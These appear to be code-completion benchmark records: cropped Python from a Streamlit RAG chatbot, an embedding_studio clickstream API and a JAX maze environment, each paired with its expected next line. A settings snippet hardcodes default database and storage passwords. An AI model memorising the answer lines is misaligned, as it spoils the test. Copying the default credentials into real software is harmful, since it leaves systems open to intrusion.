"snippet": "def generate_ticket(neo4j_graph, llm_chain, input_question):\n # Get high ranked questions\n records = neo4j_graph.query(\n \"MATCH (q:Question) RETURN q.title AS title, q.body AS body ORDER BY q.score DESC LIMIT 3\"\n )\n questions = []\n for i, question in enumerate(records, start=1):\n questions.append((question[\"title\"], question[\"body\"]))\n # Ask LLM to generate new question in the same style\n questions_prompt = \"\"\n for i, question in enumerate(questions, start=1):\n questions_prompt += f\"{i}. \\n{question[0]}\\n----\\n\\n\"\n questions_prompt += f\"{question[1][:150]}\\n\\n\"\n questions_prompt += \"----\\n\\n\"\n\n gen_system_template = f\"\"\"\n You're an expert in formulating high quality questions. \n Formulate a question in the same style and tone as the following example questions.\n {questions_prompt}\n ---\n\n Don't make anything up, only use information in the following question.\n Return a title for the question, and the question post itself.\n\n Return format template:\n ---\n Title: This is a new title\n Question: This is a new question\n ---\n \"\"\"\n # we need jinja2 since the questions themselves contain curly braces\n system_prompt = SystemMessagePromptTemplate.from_template(\n gen_system_template, template_format=\"jinja2\"\n )\n chat_prompt = ChatPromptTemplate.from_messages(\n [\n system_prompt,\n SystemMessagePromptTemplate.from_template(\n \"\"\"\n Respond in the following template format or you will be unplugged.\n ---\n Title: New title\n Question: New question\n ---\n \"\"\"\n ),\n HumanMessagePromptTemplate.from_template(\"{question}\"),\n ]\n )\n llm_response = llm_chain(\n f\"Here's the question to rewrite in the expected format: ```{input_question}```\",\n [],\n chat_prompt,\n )\n new_title, new_question = extract_title_and_question(llm_response[\"answer\"])\n return (new_title, new_question)"
}
] | import os
import streamlit as st
from streamlit.logger import get_logger
from langchain.callbacks.base import BaseCallbackHandler
from langchain.graphs import Neo4jGraph
from dotenv import load_dotenv
from utils import (
create_vector_index,
)
from chains import (
load_embedding_model,
load_llm,
configure_llm_only_chain,
configure_qa_rag_chain,
generate_ticket,
) | 3,097 | self.text = initial_text
def on_llm_new_token(self, token: str, **kwargs) -> None:
self.text += token
self.container.markdown(self.text)
llm = load_llm(llm_name, logger=logger, config={"ollama_base_url": ollama_base_url})
llm_chain = configure_llm_only_chain(llm)
rag_chain = configure_qa_rag_chain(
llm, embeddings, embeddings_store_url=url, username=username, password=password
)
# Streamlit UI
styl = f"""
<style>
/* not great support for :has yet (hello FireFox), but using it for now */
.main {{
background-image: url('https://vior-lys.s3.amazonaws.com/img/kccnna23.png');
background-repeat: repeat;
background-size: cover;
background-attachment: fixed;
}}
.element-container:has([aria-label="Select RAG mode"]) {{
position: fixed;
bottom: 33px;
z-index: 101;
}}
.stChatFloatingInputContainer {{
bottom: 20px;
background: transparent;
}}
/* Generate ticket text area */
textarea[aria-label="Description"] {{
height: 200px;
}}
</style>
"""
st.markdown(styl, unsafe_allow_html=True)
def chat_input():
user_input = st.chat_input("What does the KubeCon + CloudNativeCon audience want to know today?")
if user_input:
with st.chat_message("user"):
st.write(user_input)
with st.chat_message("assistant"):
st.caption(f"RAG: {name}")
stream_handler = StreamHandler(st.empty())
result = output_function(
{"question": user_input, "chat_history": []}, callbacks=[stream_handler]
)["answer"]
output = result
st.session_state[f"user_input"].append(user_input)
st.session_state[f"generated"].append(output)
st.session_state[f"rag_mode"].append(name)
def display_chat():
# Session state
if "generated" not in st.session_state:
st.session_state[f"generated"] = []
if "user_input" not in st.session_state:
st.session_state[f"user_input"] = []
if "rag_mode" not in st.session_state:
st.session_state[f"rag_mode"] = []
if st.session_state[f"generated"]:
size = len(st.session_state[f"generated"])
# Display only the last three exchanges
for i in range(max(size - 3, 0), size):
with st.chat_message("user"):
st.write(st.session_state[f"user_input"][i])
with st.chat_message("assistant"):
st.caption(f"RAG: {st.session_state[f'rag_mode'][i]}")
st.write(st.session_state[f"generated"][i])
with st.expander("Not finding what you're looking for?"):
st.write(
"Automatically generate a draft for an internal ticket to our support team."
)
st.button(
"Generate ticket",
type="primary",
key="show_ticket",
on_click=open_sidebar,
)
with st.container():
st.write(" ")
def mode_select() -> str:
options = ["Disabled", "Enabled"]
return st.radio("Select RAG mode", options, horizontal=True)
name = mode_select()
if name == "LLM only" or name == "Disabled":
output_function = llm_chain
elif name == "Vector + Graph" or name == "Enabled":
output_function = rag_chain
def open_sidebar():
st.session_state.open_sidebar = True
def close_sidebar():
st.session_state.open_sidebar = False
if not "open_sidebar" in st.session_state:
st.session_state.open_sidebar = False
if st.session_state.open_sidebar:
|
load_dotenv(".env")
url = os.getenv("NEO4J_URI")
username = os.getenv("NEO4J_USERNAME")
password = os.getenv("NEO4J_PASSWORD")
ollama_base_url = os.getenv("OLLAMA_BASE_URL")
embedding_model_name = os.getenv("EMBEDDING_MODEL")
llm_name = os.getenv("LLM")
# Remapping for Langchain Neo4j integration
os.environ["NEO4J_URL"] = url
logger = get_logger(__name__)
# if Neo4j is local, you can go to http://localhost:7474/ to browse the database
neo4j_graph = Neo4jGraph(url=url, username=username, password=password)
embeddings, dimension = load_embedding_model(
embedding_model_name, config={"ollama_base_url": ollama_base_url}, logger=logger
)
create_vector_index(neo4j_graph, dimension)
class StreamHandler(BaseCallbackHandler):
def __init__(self, container, initial_text=""):
self.container = container
self.text = initial_text
def on_llm_new_token(self, token: str, **kwargs) -> None:
self.text += token
self.container.markdown(self.text)
llm = load_llm(llm_name, logger=logger, config={"ollama_base_url": ollama_base_url})
llm_chain = configure_llm_only_chain(llm)
rag_chain = configure_qa_rag_chain(
llm, embeddings, embeddings_store_url=url, username=username, password=password
)
# Streamlit UI
styl = f"""
<style>
/* not great support for :has yet (hello FireFox), but using it for now */
.main {{
background-image: url('https://vior-lys.s3.amazonaws.com/img/kccnna23.png');
background-repeat: repeat;
background-size: cover;
background-attachment: fixed;
}}
.element-container:has([aria-label="Select RAG mode"]) {{
position: fixed;
bottom: 33px;
z-index: 101;
}}
.stChatFloatingInputContainer {{
bottom: 20px;
background: transparent;
}}
/* Generate ticket text area */
textarea[aria-label="Description"] {{
height: 200px;
}}
</style>
"""
st.markdown(styl, unsafe_allow_html=True)
def chat_input():
user_input = st.chat_input("What does the KubeCon + CloudNativeCon audience want to know today?")
if user_input:
with st.chat_message("user"):
st.write(user_input)
with st.chat_message("assistant"):
st.caption(f"RAG: {name}")
stream_handler = StreamHandler(st.empty())
result = output_function(
{"question": user_input, "chat_history": []}, callbacks=[stream_handler]
)["answer"]
output = result
st.session_state[f"user_input"].append(user_input)
st.session_state[f"generated"].append(output)
st.session_state[f"rag_mode"].append(name)
def display_chat():
# Session state
if "generated" not in st.session_state:
st.session_state[f"generated"] = []
if "user_input" not in st.session_state:
st.session_state[f"user_input"] = []
if "rag_mode" not in st.session_state:
st.session_state[f"rag_mode"] = []
if st.session_state[f"generated"]:
size = len(st.session_state[f"generated"])
# Display only the last three exchanges
for i in range(max(size - 3, 0), size):
with st.chat_message("user"):
st.write(st.session_state[f"user_input"][i])
with st.chat_message("assistant"):
st.caption(f"RAG: {st.session_state[f'rag_mode'][i]}")
st.write(st.session_state[f"generated"][i])
with st.expander("Not finding what you're looking for?"):
st.write(
"Automatically generate a draft for an internal ticket to our support team."
)
st.button(
"Generate ticket",
type="primary",
key="show_ticket",
on_click=open_sidebar,
)
with st.container():
st.write(" ")
def mode_select() -> str:
options = ["Disabled", "Enabled"]
return st.radio("Select RAG mode", options, horizontal=True)
name = mode_select()
if name == "LLM only" or name == "Disabled":
output_function = llm_chain
elif name == "Vector + Graph" or name == "Enabled":
output_function = rag_chain
def open_sidebar():
st.session_state.open_sidebar = True
def close_sidebar():
st.session_state.open_sidebar = False
if not "open_sidebar" in st.session_state:
st.session_state.open_sidebar = False
if st.session_state.open_sidebar: | new_title, new_question = generate_ticket( | 5 | 2023-10-30 22:07:50+00:00 | 4k |
EulerSearch/embedding_studio | embedding_studio/api/api_v1/endpoints/clickstream_client.py | [
{
"identifier": "SessionAddEventsRequest",
"path": "embedding_studio/api/api_v1/schemas/clickstream_client.py",
"snippet": "class SessionAddEventsRequest(BaseModel):\n session_id: str\n events: List[NewSessionEvent]"
},
{
"identifier": "SessionCreateRequest",
"path": "embedding_studio/api/api_v1/schemas/clickstream_client.py",
"snippet": "class SessionCreateRequest(BaseModel):\n session_id: str\n search_query: str\n search_results: List[SearchResultItem]\n search_meta: Optional[Dict[str, Any]] = None\n user_id: Optional[str] = None\n created_at: Optional[int] = None"
},
{
"identifier": "SessionGetResponse",
"path": "embedding_studio/api/api_v1/schemas/clickstream_client.py",
"snippet": "class SessionGetResponse(SessionCreateRequest):\n created_at: int\n is_irrelevant: bool\n events: List[SessionEvent]"
},
{
"identifier": "SessionMarkIrrelevantRequest",
"path": "embedding_studio/api/api_v1/schemas/clickstream_client.py",
"snippet": "class SessionMarkIrrelevantRequest(BaseModel):\n session_id: str"
},
{
"identifier": "context",
"path": "embedding_studio/context/app_context.py",
"snippet": "class AppContext:"
},
{
"identifier": "settings",
"path": "embedding_studio/core/config.py",
"snippet": "class Settings(BaseSettings):\n API_V1_STR: str = \"/api/v1\"\n SECRET_KEY: str = secrets.token_urlsafe(32)\n ACCESS_TOKEN_EXPIRE_MINUTES: int = 60 * 24 * 8\n BACKEND_CORS_ORIGINS: List[AnyHttpUrl] = []\n FINETUNING_MONGO_HOST: str = os.getenv(\"FINETUNING_MONGO_HOST\", \"mongo\")\n FINETUNING_MONGO_PORT: int = os.getenv(\"FINETUNING_MONGO_PORT\", 27017)\n FINETUNING_MONGO_DB_NAME: str = os.getenv(\n \"FINETUNING_MONGO_DB_NAME\", \"embedding_studio\"\n )\n FINETUNING_MONGO_USERNAME: str = os.getenv(\n \"FINETUNING_MONGO_USERNAME\", \"root\"\n )\n FINETUNING_MONGO_PASSWORD: str = os.getenv(\n \"FINETUNING_MONGO_PASSWORD\", \"mongopassword\"\n )\n FINETUNING_MONGO_URL: str = (\n f\"mongodb://{FINETUNING_MONGO_USERNAME}:{FINETUNING_MONGO_PASSWORD}@\"\n f\"{FINETUNING_MONGO_HOST}:{FINETUNING_MONGO_PORT}\"\n )\n CLICKSTREAM_MONGO_HOST: str = os.getenv(\"CLICKSTREAM_MONGO_HOST\", \"mongo\")\n CLICKSTREAM_MONGO_PORT: int = os.getenv(\"CLICKSTREAM_MONGO_PORT\", 27017)\n CLICKSTREAM_MONGO_DB_NAME: str = os.getenv(\n \"CLICKSTREAM_MONGO_DB_NAME\", \"embedding_studio\"\n )\n CLICKSTREAM_MONGO_USERNAME: str = os.getenv(\n \"CLICKSTREAM_MONGO_USERNAME\", \"root\"\n )\n CLICKSTREAM_MONGO_PASSWORD: str = os.getenv(\n \"CLICKSTREAM_MONGO_PASSWORD\", \"mongopassword\"\n )\n CLICKSTREAM_MONGO_URL: str = (\n f\"mongodb://{CLICKSTREAM_MONGO_USERNAME}:{CLICKSTREAM_MONGO_PASSWORD}@\"\n f\"{CLICKSTREAM_MONGO_HOST}:{CLICKSTREAM_MONGO_PORT}\"\n )\n REDIS_HOST: str = os.getenv(\"REDIS_HOST\", \"localhost\")\n REDIS_PORT: int = os.getenv(\"REDIS_PORT\", 6379)\n REDIS_PASSWORD: str = os.getenv(\"REDIS_PASSWORD\", \"redispassword\")\n REDIS_URL: str = f\"redis://{REDIS_HOST}:{REDIS_PORT}/0\"\n MINIO_HOST: str = os.getenv(\"MINIO_HOST\", \"localhost\")\n MINIO_PORT: int = os.getenv(\"MINIO_PORT\", 9000)\n MINIO_ROOT_USER: str = os.getenv(\"MINIO_ROOT_USER\", \"root\")\n MINIO_ROOT_PASSWORD: str = os.getenv(\n \"MINIO_ROOT_PASSWORD\", \"miniopassword\"\n )\n MINIO_DEFAULT_BUCKETS: str = os.getenv(\n \"MINIO_DEFAULT_BUCKETS\", \"embeddingstudio\"\n )\n MINIO_ACCESS_KEY: str = os.getenv(\n \"MINIO_ACCESS_KEY\", \"mtGNiEvoTL6C0EXAMPLE\"\n )\n MINIO_SECRET_KEY: str = os.getenv(\n \"MINIO_SECRET_KEY\", \"HY5JserXAaWmphNyCpQPEXAMPLEKEYEXAMPLEKEY\"\n )\n MYSQL_HOST: str = os.getenv(\"MYSQL_HOST\", \"localhost\")\n MYSQL_PORT: int = os.getenv(\"MYSQL_PORT\", 3306)\n MYSQL_DATABASE: str = os.getenv(\"MYSQL_DATABASE\", \"mlflow\")\n MYSQL_USER: str = os.getenv(\"MYSQL_USER\", \"mlflow_user\")\n MYSQL_PASSWORD: str = os.getenv(\"MYSQL_PASSWORD\", \"Baxp3O5rUvpIxiD77BfZ\")\n MYSQL_ROOT_PASSWORD: str = os.getenv(\n \"MYSQL_ROOT_PASSWORD\", \"PrK5qmPTDsm2IYKvHVG8\"\n )\n MLFLOW_HOST: str = os.getenv(\"MLFLOW_HOST\", \"localhost\")\n MLFLOW_PORT: int = os.getenv(\"MLFLOW_PORT\", 5001)\n MLFLOW_TRACKING_URI: str = f\"http://{MLFLOW_HOST}:{MLFLOW_PORT}\"\n ES_PLUGINS_PATH: str = os.getenv(\"ES_PLUGINS_PATH\", \"plugins\")\n FINE_TUNING_WORKER_MAX_RETRIES: int = os.getenv(\n \"FINE_TUNING_WORKER_MAX_RETRIES\", 3\n )\n FINE_TUNING_WORKER_TIME_LIMIT: int = os.getenv(\n \"FINE_TUNING_WORKER_TIME_LIMIT\", 18000000\n )\n DEFAULT_MAX_ATTEMPTS: int = os.getenv(\"DEFAULT_MAX_ATTEMPTS\", 3)\n DEFAULT_WAIT_TIME_SECONDS: float = os.getenv(\n \"DEFAULT_WAIT_TIME_SECONDS\", 3.0\n )\n S3_READ_CREDENTIALS_ATTEMPTS: int = os.getenv(\n \"S3_READ_CREDENTIALS_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n S3_READ_WAIT_TIME_SECONDS: float = os.getenv(\n \"S3_READ_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n S3_DOWNLOAD_DATA_ATTEMPTS: int = os.getenv(\n \"S3_DOWNLOAD_DATA_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n S3_DOWNLOAD_DATA_WAIT_TIME_SECONDS: float = os.getenv(\n \"S3_DOWNLOAD_DATA_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n MLFLOW_LOG_METRIC_ATTEMPTS: int = os.getenv(\n \"MLFLOW_LOG_METRIC_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_LOG_METRIC_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_LOG_METRIC_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n MLFLOW_LOG_PARAM_ATTEMPTS: int = os.getenv(\n \"MLFLOW_LOG_PARAM_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_LOG_PARAM_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_LOG_PARAM_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n MLFLOW_LOG_MODEL_ATTEMPTS: int = os.getenv(\n \"MLFLOW_LOG_MODEL_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_LOG_MODEL_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_LOG_MODEL_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n MLFLOW_LOAD_MODEL_ATTEMPTS: int = os.getenv(\n \"MLFLOW_LOAD_MODEL_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_LOAD_MODEL_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_LOAD_MODEL_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n MLFLOW_DELETE_MODEL_ATTEMPTS: int = os.getenv(\n \"MLFLOW_DELETE_MODEL_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_DELETE_MODEL_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_DELETE_MODEL_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n MLFLOW_SEARCH_RUNS_ATTEMPTS: int = os.getenv(\n \"MLFLOW_SEARCH_RUNS_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_SEARCH_RUNS_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_SEARCH_RUNS_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n MLFLOW_END_RUN_ATTEMPTS: int = os.getenv(\n \"MLFLOW_END_RUN_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_END_RUN_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_END_RUN_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n MLFLOW_GET_RUN_ATTEMPTS: int = os.getenv(\n \"MLFLOW_GET_RUN_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_GET_RUN_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_GET_RUN_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n MLFLOW_SEARCH_EXPERIMENTS_ATTEMPTS: int = os.getenv(\n \"MLFLOW_SEARCH_EXPERIMENTS_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_SEARCH_EXPERIMENTS_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_SEARCH_EXPERIMENTS_WAIT_TIME_SECONDS\",\n DEFAULT_WAIT_TIME_SECONDS,\n )\n MLFLOW_DELETE_EXPERIMENT_ATTEMPTS: int = os.getenv(\n \"MLFLOW_DELETE_EXPERIMENT_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_DELETE_EXPERIMENT_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_DELETE_EXPERIMENT_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n MLFLOW_CREATE_EXPERIMENT_ATTEMPTS: int = os.getenv(\n \"MLFLOW_CREATE_EXPERIMENT_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_CREATE_EXPERIMENT_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_CREATE_EXPERIMENT_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n MLFLOW_GET_EXPERIMENT_ATTEMPTS: int = os.getenv(\n \"MLFLOW_GET_EXPERIMENT_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_GET_EXPERIMENT_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_GET_EXPERIMENT_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n CLICKSTREAM_TIME_MAX_DELTA_MINUS_SEC: int = os.getenv(\n \"CLICKSTREAM_TIME_MAX_DELTA_MINUS_SEC\", 12 * 60 * 60\n )\n CLICKSTREAM_TIME_MAX_DELTA_PLUS_SEC: int = os.getenv(\n \"CLICKSTREAM_TIME_MAX_DELTA_PLUS_SEC\", 5 * 60\n )"
},
{
"identifier": "SessionEvent",
"path": "embedding_studio/models/clickstream/session_events.py",
"snippet": "class SessionEvent(BaseModel):\n event_id: str\n session_id: str\n object_id: str\n event_type: str\n created_at: int\n meta: Optional[Dict[str, Any]] = None"
},
{
"identifier": "Session",
"path": "embedding_studio/models/clickstream/sessions.py",
"snippet": "class Session(BaseModel):\n session_id: str\n search_query: str\n created_at: int\n search_results: List[SearchResultItem]\n search_meta: Optional[Dict[str, Any]] = None\n user_id: Optional[str] = None\n is_irrelevant: bool = False"
},
{
"identifier": "SessionWithEvents",
"path": "embedding_studio/models/clickstream/sessions.py",
"snippet": "class SessionWithEvents(RegisteredSession):\n events: List[SessionEvent]"
},
{
"identifier": "datetime_utils",
"path": "embedding_studio/utils/datetime_utils.py",
"snippet": "def current_time() -> datetime:\ndef unaware_utc_to_aware_utc(stamp: datetime):\ndef utc_with_tz() -> datetime:\ndef utc_timestamp() -> int:\ndef check_utc_timestamp(\n timestamp: int,\n delta_sec: Optional[int] = None,\n delta_minus_sec: Optional[int] = None,\n delta_plus_sec: Optional[int] = None,\n) -> bool:"
}
] | import logging
from typing import Optional
from fastapi import APIRouter, HTTPException, status
from embedding_studio.api.api_v1.schemas.clickstream_client import (
SessionAddEventsRequest,
SessionCreateRequest,
SessionGetResponse,
SessionMarkIrrelevantRequest,
)
from embedding_studio.context.app_context import context
from embedding_studio.core.config import settings
from embedding_studio.models.clickstream.session_events import SessionEvent
from embedding_studio.models.clickstream.sessions import (
Session,
SessionWithEvents,
)
from embedding_studio.utils import datetime_utils | 2,900 |
logger = logging.getLogger(__name__)
router = APIRouter()
@router.post(
"/session",
status_code=status.HTTP_200_OK,
)
def create_session(
body: SessionCreateRequest,
) -> None:
logger.debug(f"Register session: {body}")
body.created_at = _ensure_timestamp(body.created_at)
|
logger = logging.getLogger(__name__)
router = APIRouter()
@router.post(
"/session",
status_code=status.HTTP_200_OK,
)
def create_session(
body: SessionCreateRequest,
) -> None:
logger.debug(f"Register session: {body}")
body.created_at = _ensure_timestamp(body.created_at) | session = Session.model_validate(body.model_dump()) | 7 | 2023-10-31 00:33:13+00:00 | 4k |
facebookresearch/minimax | src/minimax/envs/maze/maze_ued.py | [
{
"identifier": "EnvInstance",
"path": "src/minimax/envs/maze/common.py",
"snippet": "class EnvInstance:\n\tagent_pos: chex.Array\n\tagent_dir_idx: int\n\tgoal_pos: chex.Array\n\twall_map: chex.Array"
},
{
"identifier": "make_maze_map",
"path": "src/minimax/envs/maze/common.py",
"snippet": "def make_maze_map(\n\tparams,\n\twall_map, \n\tgoal_pos, \n\tagent_pos, \n\tagent_dir_idx,\n\tpad_obs=False):\n\t# Expand maze map to H x W x C\n\tempty = jnp.array([OBJECT_TO_INDEX['empty'], 0, 0], dtype=jnp.uint8)\n\twall = jnp.array([OBJECT_TO_INDEX['wall'], COLOR_TO_INDEX['grey'], 0], dtype=jnp.uint8)\n\tmaze_map = jnp.array(jnp.expand_dims(wall_map, -1), dtype=jnp.uint8)\n\tmaze_map = jnp.where(maze_map > 0, wall, empty)\n\t\n\tagent = jnp.array([OBJECT_TO_INDEX['agent'], COLOR_TO_INDEX['red'], agent_dir_idx], dtype=jnp.uint8)\n\tagent_x,agent_y = agent_pos\n\tmaze_map = maze_map.at[agent_y,agent_x,:].set(agent)\n\n\tgoal = jnp.array([OBJECT_TO_INDEX['goal'], COLOR_TO_INDEX['green'], 0], dtype=jnp.uint8)\n\tgoal_x,goal_y = goal_pos\n\tmaze_map = maze_map.at[goal_y,goal_x,:].set(goal)\n\n\t# Add observation padding\n\tif pad_obs:\n\t\tpadding = params.agent_view_size-1\n\telse:\n\t\tpadding = 1\n\n\tmaze_map_padded = jnp.tile(wall.reshape((1,1,*empty.shape)), (maze_map.shape[0]+2*padding, maze_map.shape[1]+2*padding, 1))\n\tmaze_map_padded = maze_map_padded.at[padding:-padding,padding:-padding,:].set(maze_map)\n\n\t# Add surrounding walls\n\twall_start = padding-1 # start index for walls\n\twall_end_y = maze_map_padded.shape[0] - wall_start - 1\n\twall_end_x = maze_map_padded.shape[1] - wall_start - 1\n\tmaze_map_padded = maze_map_padded.at[wall_start,wall_start:wall_end_x+1,:].set(wall) # top\n\tmaze_map_padded = maze_map_padded.at[wall_end_y,wall_start:wall_end_x+1,:].set(wall) # bottom\n\tmaze_map_padded = maze_map_padded.at[wall_start:wall_end_y+1,wall_start,:].set(wall) # left\n\tmaze_map_padded = maze_map_padded.at[wall_start:wall_end_y+1,wall_end_x,:].set(wall) # right\n\n\treturn maze_map_padded"
}
] | from dataclasses import dataclass
from collections import namedtuple, OrderedDict
from functools import partial
from enum import IntEnum
from jax import lax
from typing import Tuple, Optional
from flax import struct
from flax.core.frozen_dict import FrozenDict
from .common import EnvInstance, make_maze_map
from minimax.envs import environment, spaces
from minimax.envs.registration import register_ued
import numpy as np
import jax
import jax.numpy as jnp
import chex | 3,210 | encoding_pos = state.encoding[1:params.n_walls+3]
last_wall_step_idx = max_n_walls
pos_dist = jnp.ones(self.n_tiles).at[
jnp.flip(encoding_pos)].set(jnp.flip(dist_values))
all_pos = jnp.arange(self.n_tiles, dtype=jnp.uint32)
# Only mark collision if replace_wall_pos=False OR the agent is placed over the goal
goal_step_idx = last_wall_step_idx + 1
agent_step_idx = last_wall_step_idx + 2
# Track whether it is the last time step
next_state = state.replace(time=state.time + 1)
done = self.is_terminal(next_state)
# Always place agent idx in last enc position.
is_agent_dir_step = jnp.logical_and(
params.set_agent_dir,
done
)
collision = jnp.logical_and(
pos_dist[action] < 1,
jnp.logical_or(
not params.replace_wall_pos,
jnp.logical_and( # agent pos cannot override goal
jnp.equal(state.time, agent_step_idx),
jnp.equal(state.encoding[goal_step_idx], action)
)
)
)
collision = (collision * (1-is_agent_dir_step)).astype(jnp.uint32)
action = (1-collision)*action + \
collision*jax.random.choice(collision_rng, all_pos, replace=False, p=pos_dist)
enc_idx = (1-is_agent_dir_step)*state.time + is_agent_dir_step*(-1)
encoding = state.encoding.at[enc_idx].set(action)
next_state = next_state.replace(
encoding=encoding,
terminal=done
)
reward = 0
obs = self._add_noise_to_obs(noise_rng, self.get_obs(next_state))
return (
lax.stop_gradient(obs),
lax.stop_gradient(next_state),
reward,
done,
{},
)
def get_env_instance(
self,
key: chex.PRNGKey,
state: EnvState
) -> chex.Array:
"""
Converts internal encoding to an instance encoding that
can be interpreted by the `set_to_instance` method
the paired Environment class.
"""
params = self.params
h = params.height
w = params.width
enc = state.encoding
# === Extract agent_dir, agent_pos, and goal_pos ===
# Num walls placed currently
if params.fixed_n_wall_steps:
n_walls = params.n_walls
enc_len = self._get_encoding_dim()
wall_pos_idx = jnp.flip(enc[:params.n_walls])
agent_pos_idx = enc_len-2 # Enc is full length
goal_pos_idx = enc_len-3
else:
n_walls = jnp.round(
params.n_walls*enc[0]/self.n_tiles
).astype(jnp.uint32)
if params.first_wall_pos_sets_budget:
wall_pos_idx = jnp.flip(enc[:params.n_walls]) # So 0-padding does not override pos=0
enc_len = n_walls + 2 # [wall_pos] + len((goal, agent))
else:
wall_pos_idx = jnp.flip(enc[1:params.n_walls+1])
enc_len = n_walls + 3 # [wall_pos] + len((n_walls, goal, agent))
agent_pos_idx = enc_len-1 # Positions are relative to n_walls when n_walls is variable.
goal_pos_idx = enc_len-2
# Get agent + goal info (set agent/goal pos 1-step out of range if they are not yet placed)
goal_placed = state.time > jnp.array([goal_pos_idx], dtype=jnp.uint32)
goal_pos = \
goal_placed*jnp.array([enc[goal_pos_idx]%w, enc[goal_pos_idx]//w], dtype=jnp.uint32) \
+ (~goal_placed)*jnp.array([w,h], dtype=jnp.uint32)
agent_placed = state.time > jnp.array([agent_pos_idx], dtype=jnp.uint32)
agent_pos = \
agent_placed*jnp.array([enc[agent_pos_idx]%w, enc[agent_pos_idx]//w], dtype=jnp.uint32) \
+ (~agent_placed)*jnp.array([w,h], dtype=jnp.uint32)
agent_dir_idx = jnp.floor((4*enc[-1]/self.n_tiles)).astype(jnp.uint8)
# Make wall map
wall_start_time = jnp.logical_and( # 1 if explicitly predict # blocks, else 0
not params.fixed_n_wall_steps,
not params.first_wall_pos_sets_budget
).astype(jnp.uint32)
wall_map = jnp.zeros(h*w, dtype=jnp.bool_)
wall_values = jnp.arange(params.n_walls) + wall_start_time < jnp.minimum(state.time, n_walls + wall_start_time)
wall_values = jnp.flip(wall_values)
wall_map = wall_map.at[wall_pos_idx].set(wall_values)
# Zero out walls where agent and goal reside
agent_mask = agent_placed*(~(jnp.arange(h*w) == state.encoding[agent_pos_idx])) + ~agent_placed*wall_map
goal_mask = goal_placed*(~(jnp.arange(h*w) == state.encoding[goal_pos_idx])) + ~goal_placed*wall_map
wall_map = wall_map*agent_mask*goal_mask
wall_map = wall_map.reshape(h,w)
| """
Copyright (c) Meta Platforms, Inc. and affiliates.
All rights reserved.
This source code is licensed under the license found in the
LICENSE file in the root directory of this source tree.
"""
class SequentialActions(IntEnum):
skip = 0
wall = 1
goal = 2
agent = 3
@struct.dataclass
class EnvState:
encoding: chex.Array
time: int
terminal: bool
@struct.dataclass
class EnvParams:
height: int = 15
width: int = 15
n_walls: int = 25
noise_dim: int = 50
replace_wall_pos: bool = False
fixed_n_wall_steps: bool = False
first_wall_pos_sets_budget: bool = False
use_seq_actions: bool = False,
set_agent_dir: bool = False
normalize_obs: bool = False
singleton_seed: int = -1
class UEDMaze(environment.Environment):
def __init__(
self,
height=13,
width=13,
n_walls=25,
noise_dim=16,
replace_wall_pos=False,
fixed_n_wall_steps=False,
first_wall_pos_sets_budget=False,
use_seq_actions=False,
set_agent_dir=False,
normalize_obs=False,
):
"""
Using the original action space requires ensuring proper handling
of a sequence with trailing dones, e.g. dones: 0 0 0 0 1 1 1 1 1 ... 1.
Advantages and value losses should only be computed where ~dones[0].
"""
assert not (first_wall_pos_sets_budget and fixed_n_wall_steps), \
'Setting first_wall_pos_sets_budget=True requires fixed_n_wall_steps=False.'
super().__init__()
self.n_tiles = height*width
self.action_set = jnp.array(jnp.arange(self.n_tiles)) # go straight, turn left, turn right, take action
self.params = EnvParams(
height=height,
width=width,
n_walls=n_walls,
noise_dim=noise_dim,
replace_wall_pos=replace_wall_pos,
fixed_n_wall_steps=fixed_n_wall_steps,
first_wall_pos_sets_budget=first_wall_pos_sets_budget,
use_seq_actions=False,
set_agent_dir=set_agent_dir,
normalize_obs=normalize_obs,
)
@staticmethod
def align_kwargs(kwargs, other_kwargs):
kwargs.update(dict(
height=other_kwargs['height'],
width=other_kwargs['width'],
))
return kwargs
def _add_noise_to_obs(self, rng, obs):
if self.params.noise_dim > 0:
